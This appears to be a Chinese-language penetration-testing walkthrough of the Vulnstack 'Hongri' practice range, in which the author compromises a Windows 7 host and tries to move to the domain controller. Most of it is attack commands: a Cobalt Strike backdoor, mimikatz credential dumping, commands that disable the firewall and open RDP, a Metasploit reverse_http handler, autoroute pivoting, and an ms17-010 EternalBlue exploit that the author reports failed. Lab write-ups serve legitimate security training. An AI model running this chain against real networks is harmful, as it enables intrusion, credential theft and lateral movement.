1、靶机上线cs
我们已经拿到了win7的shell,执行whoami,发现win7是administrator权限,且在域中
执行ipconfig发现了win7存在内网网段192.168.52.0/24
kali开启cs服务端
客户端启动cs
先在cs中创建一个监听器
接着用cs生成后门,记得把杀软先关掉,不然后门生成就立马被杀了
使用蚁剑把后门上传到win7靶机的yxcms目录下
蚁剑上执行后门
cs上线成功
2、内网信息收集
使用mimikatz抓取目标的用户密码,直接拿下
这里抓取到密码之后,我们执行 net view 发现了域内另外俩台机器点击这里可以看到
(1)域内信息收集
内网信息收集的主要目的就是查找域控以及域内的其他主机
net view # 查看局域网内其他主机名
net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user # 查看本机用户列表
net user /domain # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain # 查看有几个域
net user 用户名 /domain # 获取指定域用户的信息
net group /domain # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain # 查看域中某工作组
net group "domain admins" /domain # 查看域管理员的名字
net group "domain computers" /domain # 查看域中的其他主机名
net group "doamin controllers" /domain # 查看域控制器主机名(可能有多台)
查看计算机名、全名、用户名、系统版本、工作站、域、登录域
1、先判断是否存在域,使用 ipconfig /all 查看 DNS 服务器,发现主 DNS 后缀不为空,存在域god.org
也可以执行命令net config workstation 来查看当前计算机名、全名、用户名、系统版本、工作站、域、登录域等全面的信息
2、上面发现 DNS 服务器名为 god.org,当前登录域为 GOD 再执行net view /domain查看有几个域(可能有多个)
3、查看域的组账户信息(工作组) net group /domain
4、既然只有一个域,那就利用 net group "domain controllers" /domain 命令查看域控制器主机名,直接确认域控主机的名称为 OWA
5、确认域控主机的名称为 OWA 再执行 net view 查看局域网内其他主机信息(主机名称、IP地址)
扫描出来:
域控主机:OWA ip:192.168.52.138
域成员主机:ROOT-TVI862UBEH IP:192.168.52.141
STU1 IP:192.168.52.143
接下来的目标就是横向渗透拿下域控
(2)rdp远程登录win7
Win7跳板机 默认是不开启3389的,同时还有防火墙
#注册表开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
#添加防火墙规则
netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389
#关闭防火墙
netsh firewall set opmode disable #winsows server 2003 之前
netsh advfirewall set allprofiles state off #winsows server 2003 之后
以域用户GOD\Administrator登录
输入密码
成功登录
3、内网渗透
(1)CS派生会话给MSF
1、msf开启监听
msfconsole # 启动MSF框架
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.236.128
set lport 1111
exploit
2.CS开启外部监听
新建一个监听器,host为msf的ip,port与上面msf设置一致
3、cs把控制的主机会话派生给msf
右键增加会话,选择刚刚新建的外部监听器
msf收到cs派生的shell
4、msf简单利用
获得 MSF 的会话后即可使用 MSF 集成的诸多强大功能模块和脚本。简单演示下,如调用post/windows/gather/checkvm判断靶机是否属于虚拟机(检查是否进入了蜜罐):
再如调用 post/windows/gather/enum_applications模块枚举列出安装在靶机上的应用程序:
5、添加路由
# 可以用模块自动添加路由
run post/multi/manage/autoroute
#添加一条路由
run autoroute -s 192.168.52.0/24
#查看路由添加情况
run autoroute -p
6、内网端口扫描
先执行background 命令将当前执行的 Meterpreter 会话切换到后台(后续也可执行sessions -i 重新返回会话),然后使用 MSF 自带 auxiliary/scanner/portscan/tcp 模块扫描内网域控主机 192.168.52.138 开放的端口:
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.138
set ports 80,135-139,445,3306,3389
run
可以看到域控主机win2008 192.168.52.138开启了80,139,135,445端口
(2)MSF进行ms17-010攻击
1、msf扫描模块探测是否存在ms17-010漏洞
对于开启了 445 端口的 Windows 服务器肯定是要进行一波永恒之蓝扫描尝试的,借助 MSF 自带的漏洞扫描模块进行扫描:
search ms17_010
use 3
set rhosts 192.168.52.138
run
可能存在ms17-010漏洞
2、漏洞利用
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp #内网环境,需要正向shell连接
set rhosts 192.168.52.138
run
好像没有成功
参考:Vulnstack 红日安全内网靶场[一] - 1vxyz - 博客园 (cnblogs.com)